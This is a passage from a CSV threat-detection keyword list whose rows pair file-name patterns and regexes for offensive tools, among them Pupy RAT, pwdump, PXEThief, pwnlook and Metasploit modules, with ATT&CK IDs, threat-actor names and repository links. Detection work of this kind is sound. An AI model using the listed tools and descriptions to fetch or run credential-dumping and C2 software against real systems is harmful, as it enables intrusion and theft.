"*/PupyOffload.py*",".{0,1000}\/PupyOffload\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10018"
"*/pupyps.py*",".{0,1000}\/pupyps\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10019"
"*/PupyServer.py*",".{0,1000}\/PupyServer\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10020"
"*/PupyService.py*",".{0,1000}\/PupyService\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10021"
"*/pupysh.py*",".{0,1000}\/pupysh\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10022"
"*/pupysh.sh*",".{0,1000}\/pupysh\.sh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10023"
"*/PupyTriggers.py*",".{0,1000}\/PupyTriggers\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10024"
"*/PupyWeb.py*",".{0,1000}\/PupyWeb\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10025"
"*/pupyx64.dll*",".{0,1000}\/pupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10026"
"*/pupyx64.exe*",".{0,1000}\/pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10027"
"*/pupyx64d.exe*",".{0,1000}\/pupyx64d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10028"
"*/pupyx86.exe*",".{0,1000}\/pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10029"
"*/pupyx86d.exe*",".{0,1000}\/pupyx86d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10030"
"*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10031"
"*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10032"
"*/putter.profile*",".{0,1000}\/putter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","10033"
"*/PView.psm1*",".{0,1000}\/PView\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","10034"
"*/PWA-Phishing.git*",".{0,1000}\/PWA\-Phishing\.git.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","10035"
"*/pwcrack banner*",".{0,1000}\/pwcrack\sbanner.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#linux","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10036"
"*/pwcrack.sh*",".{0,1000}\/pwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","10037"
"*/pwcrack-framework.git*",".{0,1000}\/pwcrack\-framework\.git.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10038"
"*/pwcrack-framework/*",".{0,1000}\/pwcrack\-framework\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10039"
"*/pwdump.py*",".{0,1000}\/pwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","10040"
"*/pwdump.py*",".{0,1000}\/pwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10041"
"*/pwdump7.zip*",".{0,1000}\/pwdump7\.zip.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10042"
"*/pwdump8.*",".{0,1000}\/pwdump8\..{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10043"
"*/pwn_php.me*",".{0,1000}\/pwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","10044"
"*/pwn_python.me*",".{0,1000}\/pwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","10045"
"*/PwnDB.py*",".{0,1000}\/PwnDB\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","10047"
"*/pwndrop.git*",".{0,1000}\/pwndrop\.git.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","10048"
"*/pwndrop.ini*",".{0,1000}\/pwndrop\.ini.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","10049"
"*/Pwned.as*",".{0,1000}\/Pwned\.as.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10050"
"*/PwnKit-Exploit*",".{0,1000}\/PwnKit\-Exploit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","10051"
"*/pwnlook.exe*",".{0,1000}\/pwnlook\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10052"
"*/pwnlook.git*",".{0,1000}\/pwnlook\.git.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10053"
"*/pwnlook/releases/download/*",".{0,1000}\/pwnlook\/releases\/download\/.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10054"
"*/pwnlook35.exe*",".{0,1000}\/pwnlook35\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10055"
"*/pwnlook481.exe*",".{0,1000}\/pwnlook481\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10056"
"*/pxesploit/*",".{0,1000}\/pxesploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10057"
"*/PXEThief*",".{0,1000}\/PXEThief.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","10058"
"*/pxexploit*",".{0,1000}\/pxexploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10059"
